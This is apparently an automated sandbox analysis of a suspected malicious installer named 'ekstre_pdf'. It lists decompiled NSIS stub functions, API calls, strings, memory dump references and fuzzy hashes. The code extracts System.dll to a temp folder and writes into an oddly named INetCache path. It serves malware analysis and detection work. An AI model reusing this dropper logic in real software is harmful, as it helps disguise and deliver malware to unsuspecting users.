						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x43c224; // 0x4d178
						if(__eflags < 0) {
							_v12 = E004069F7(_v12, 0x428218, _t90);
						}
						 *0x430218 =  *0x430218 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fc
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031f7
0x004031fe
0x00000000
0x00000000
0x00403200
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x0040324e
0x00403251
0x00403264
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x004032ab
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x00403216
0x0040321b
0x0040321d
0x00000000
0x00000000
0x00403222
0x00403225
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403125
0x00403127
0x00403129
0x00403129
0x0040312d
0x00403132
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x0040313a
0x00403141
0x004031bd
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403152
0x00403157
0x00000000
0x00000000
0x00403159
0x00403160
0x00000000
0x00000000
0x00403162
0x00403169
0x00000000
0x00000000
0x0040316b
0x00403172
0x00000000
0x00000000
0x00403174
0x0040317b
0x00000000
0x00000000
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403195
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a3
0x004031a7
0x004031af
0x004031af
0x004031b2
0x004031b5
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x004031b7
0x004031a9
0x004031ad
0x00000000
0x00000000
0x00000000
0x004031cb
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031e6
0x004031ee
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,004E8000,00002000,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,004E8000,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,004EC000,00000000,004D8000,004D8000,004E8000,004E8000,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

Inst, xrefs: 00403162
Error launching installer, xrefs: 004030CD
soft, xrefs: 0040316B
}8@, xrefs: 00403227, 00403242
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
Null, xrefs: 00403174

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-2852043193
Opcode ID: b6ed97f909168a5013d53fe505e8d12d92d0e697bfb97da6fd1851104d111c7a
Instruction ID: 2c7d663256887723bf3426c798389e24e8654b91e73e541231d973b9b4b409a2
Opcode Fuzzy Hash: b6ed97f909168a5013d53fe505e8d12d92d0e697bfb97da6fd1851104d111c7a
Instruction Fuzzy Hash: 3851D471900204ABDB10AF65DD86B9E7EACAB48756F10817FF904B62D1D77C8F80879D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme\\Eksamenskvotientens144\\Nephrosclerosis\\Dingwall")), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x47af88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nslB24E.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nslB24E.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nslB24E.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nslB24E.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x47af88 =  &( *0x47af88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x47afb4 =  *0x47afb4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x38));
				_push( *((intOrPtr*)(_t86 - 0x28)));
				_t45 = E004032B4(); // executed
				 *0x47afb4 =  *0x47afb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00002000,0040369D,00472F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000,004343DD,759D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000,004343DD,759D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14, xrefs: 0040179E
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nslB24E.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14$C:\Users\user\AppData\Local\Temp\nslB24E.tmp$C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll$Call
API String ID: 1941528284-999333794
Opcode ID: f1bdd4d67baf13a70ae80f0d73e3049467068d93a57d3864378aac1ededa78f6
Instruction ID: c433c6abcee27f924f40a47108ac9aa794824dab2afe556ffc3491a33643f240
Opcode Fuzzy Hash: f1bdd4d67baf13a70ae80f0d73e3049467068d93a57d3864378aac1ededa78f6
Instruction Fuzzy Hash: 3E41D571900108BACF11BFB5DD85DAE7A79EF45728B20433FF422B10E1D63C8A91966E

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x434220;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x47af58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x430220, _t98) == 0) {
								goto L41;
							}
							_t69 = E004060DF(_a8, 0x430220, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x41eb84 =  *0x41eb84 & 0x00000000;
					 *0x41eb80 =  *0x41eb80 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x41e668 = 8;
					 *0x428210 = 0x420208;
					 *0x42820c = 0x420208;
					 *0x428208 = 0x428208;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x430220, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x41e658 = 0x430220;
						 *0x41e65c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x41e660 = _t95;
							 *0x41e664 = _v12;
							_t75 = E00406A65(0x41e658);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x41e660; // 0x4343dd
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x47afb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x41e660; // 0x4343dd
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dd
0x004032df
0x004032df
0x004032e6
0x004032eb
0x004032f6
0x004032f6
0x00403308
0x004034bd
0x004034bd
0x00000000
0x0040330e
0x00403312
0x0040346a
0x004034ad
0x004034af
0x004034af
0x004034bb
0x004034c2
0x004034c5
0x00000000
0x00000000
0x00000000
0x00000000
0x004034bb
0x0040346f
0x00000000
0x00000000
0x00403471
0x00403474
0x00403477
0x0040347a
0x0040347c
0x0040347c
0x0040348c
0x00000000
0x00000000
0x00403493
0x0040349a
0x00403464
0x00403464
0x004034bf
0x004034bf
0x00000000
0x004034bf
0x0040349c
0x0040349f
0x004034a6
0x00000000
0x00000000
0x00000000
0x004034a8
0x00000000
0x00403474
0x0040331e
0x00403320
0x00403327
0x0040332e
0x0040332e
0x00403335
0x0040333d
0x00403347
0x0040334c
0x00403354
0x0040335e
0x00403361
0x00000000
0x00000000
0x00000000
0x00000000
0x00403367
0x00403367
0x00403367
0x0040336f
0x00403371
0x00403371
0x00403382
0x00000000
0x00000000
0x00403388
0x0040338b
0x00403391
0x00403397
0x00403397
0x004033a2
0x004033a8
0x004033ad
0x004033b4
0x004033b7
0x00000000
0x00000000
0x004033bd
0x004033c3
0x004033c5
0x004033ce
0x004033d0
0x00403401
0x00403407
0x00403413
0x00403418
0x00403418
0x0040341d
0x00403458
0x00000000
0x00000000
0x00000000
0x0040341f
0x00403423
0x0040343a
0x0040343f
0x00403442
0x00403445
0x00403448
0x0040344c
0x00000000
0x00000000
0x00000000
0x00403452
0x0040342c
0x00403433
0x00000000
0x00000000
0x00403435
0x00000000
0x00403435
0x0040341d
0x00403460
0x00000000
0x00403460
0x00000000
0x00403367

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

... %d%%, xrefs: 004033FB
BC, xrefs: 004032DF
}8@, xrefs: 004032B4
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M5 1.762a.75.75 0 00-.57.25C4.18 2.302 2 4.908 2 7c0 .774.267 1.5.752 2.045C3.14 9.48 3.843 10 5 10c1.969 0 3-1.509 3-3 0-2.092-2.183-4.698-2.43-4.988a.745.745 0 00-.57-.25zm6 4a.75.75 0 0, xrefs: 00403338

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: BC$... %d%%$<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M5 1.762a.75.75 0 00-.57.25C4.18 2.302 2 4.908 2 7c0 .774.267 1.5.752 2.045C3.14 9.48 3.843 10 5 10c1.969 0 3-1.509 3-3 0-2.092-2.183-4.698-2.43-4.988a.745.745 0 00-.57-.25zm6 4a.75.75 0 0$}8@
API String ID: 551687249-4262528670
Opcode ID: a4ca2cef807eaad98717882fb1d5cf5bcb62f85f0fcfa436534f9cdc44853a44
Instruction ID: ae95ab084020b9dd363418cd327c97a05f5cd228a716f9c9998669971f568782
Opcode Fuzzy Hash: a4ca2cef807eaad98717882fb1d5cf5bcb62f85f0fcfa436534f9cdc44853a44
Instruction Fuzzy Hash: 3551BF71910219DBCB11DF66D944B9F7BB8AF04716F10827BE804BB2C1D7389E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x472ee4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x47afb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x448248, 0x448248, _a4);
					}
					_t27 = lstrlenW(0x448248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x472ec8, 0x448248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x448248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x448248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x8000) {
							_t27 = lstrcatW(0x448248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004055a5
0x004055af
0x004055b4
0x004055ba
0x004055c5
0x004055c8
0x004055cb
0x004055d1
0x004055d1
0x004055d7
0x004055df
0x004055e2
0x004055ff
0x00405603
0x0040560c
0x0040560c
0x00405616
0x0040561f
0x0040562b
0x00405632
0x00405636
0x00405639
0x0040564c
0x0040565a
0x0040565a
0x0040565e
0x00405660
0x00405663
0x00000000
0x00405663
0x004055e4
0x004055ec
0x004055f4
0x004055fa
0x00000000
0x004055fa
0x004055f4
0x004055e2
0x0040566f

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000,004343DD,759D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000,004343DD,759D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00403418), ref: 004055FA
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll, xrefs: 004055C0, 004055D0, 004055D6, 004055F9, 00405605

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
